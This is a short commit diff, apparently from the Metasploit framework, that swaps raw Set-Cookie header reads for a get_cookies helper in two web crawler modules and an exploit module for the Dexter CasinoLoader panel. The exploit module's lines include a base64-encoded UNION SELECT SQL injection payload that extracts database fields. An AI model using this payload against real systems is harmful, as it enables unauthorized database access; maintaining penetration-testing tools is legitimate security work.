Land rapid7#3400, last msftody set-cookie warnings

Author: firefart

modules/auxiliary/crawler/msfcrawler.rb

@@ -258,11 +258,6 @@ def sendreq(nclient,reqopts={})
         # In case modules or crawler calls to_s on de-chunked responses
         #
         resp.transfer_chunked = false
-        if resp['Set-Cookie']
-          #puts "Set Cookie: #{resp['Set-Cookie']}"
-          #puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}"
-          #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie']
-        end
 
         if datastore['StoreDB']
           storedb(reqopts,resp,$dbpathmsf)

modules/auxiliary/scanner/http/crawler.rb

@@ -104,8 +104,8 @@ def crawler_process_page(t, page, cnt)
       info[:ctype] = page.headers['content-type']
     end
 
-    if page.headers['set-cookie']
-      info[:cookie] = page.headers['set-cookie']
+    if !page.get_cookies.empty?
+      info[:cookie] = page.get_cookies
     end
 
     if page.headers['authorization']

modules/exploits/multi/http/dexter_casinoloader_exec.rb

@@ -79,8 +79,8 @@ def database_get_field(table, column, row)
         'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --")
       }
     })
-    if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=')
-      return Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3]
+    if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=')
+      return Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1]))[1..-3]
     end
     return false
   end
@@ -96,8 +96,8 @@ def check
       }
     })
 
-    if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') and
-      Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
+    if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=') and
+      Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false
       return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
@@ -167,4 +167,4 @@ def exploit
       return
     end
   end
-end
+end